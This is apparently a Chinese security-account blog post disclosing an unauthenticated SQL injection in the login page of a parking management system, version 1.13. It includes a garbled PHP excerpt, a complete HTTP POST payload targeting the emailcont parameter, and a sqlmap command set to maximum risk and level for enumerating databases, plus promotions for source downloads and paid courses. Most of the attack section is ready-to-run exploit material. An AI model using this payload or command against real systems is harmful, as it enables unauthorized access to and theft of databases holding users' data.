国外某停车管理系统V1.13存在前台SQL注入漏洞

原创 Mstir 星悦安全 2025-05-10 08:22

点击上方
蓝字
关注我们 并设为
星标

0x00 前言

车辆停车管理系统是一种基于 Web 的技术，它将管理停车场进出车辆的记录。如果车辆已被访问，管理员很容易检索数据，他可以通过号码获取该数据。车辆停车管理系统是一种自动系统，以非常高的速度提供数据处理.

📍 漏洞由星群漏洞库检索发现 
📍

0x01 漏洞分析&复现

位于 
/users/login.php 中通过POST传入 
emailcont 参数后直接被带入到SQL查询字句中，且未加过滤，导致漏洞产生。“`

0){
      $_SESSION[‘vpmsuid’]=$ret[‘ID’];
      $_SESSION[‘vpmsumn’]=$ret[‘MobileNumber’];
     header(‘location:dashboard.php’);
    }
    else{
  
    echo ““;
    }
  }
  ?>

Payload:```
POST /vms/vpms/users/login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fts8bkugo602dkngvre7tbqn6t
Host: 192.168.65.5:8080
Origin: http://192.168.65.5:8080
Referer: http://192.168.65.5:8080/vms/vpms/users/login.php
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36

emailcont=1234567890*&password=1*&login=

sqlmap -r sql.txt –batch –risk 3 –level 5 –dbs

0x02 源码下载

标签:代码审计，0day，渗透测试，系统，通用，0day，闲鱼，转转

停车管理系统关注公众号，发送 250510 获取!

有审计上或者漏洞相关的问题可以加下方小助理私信询问，代码审计课程第二期，知识星球，CISP-PTE 等证书，等相关事宜也可私信，全网低价.

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，文章作者和本公众号不承担任何法律及连带责任，望周知！！!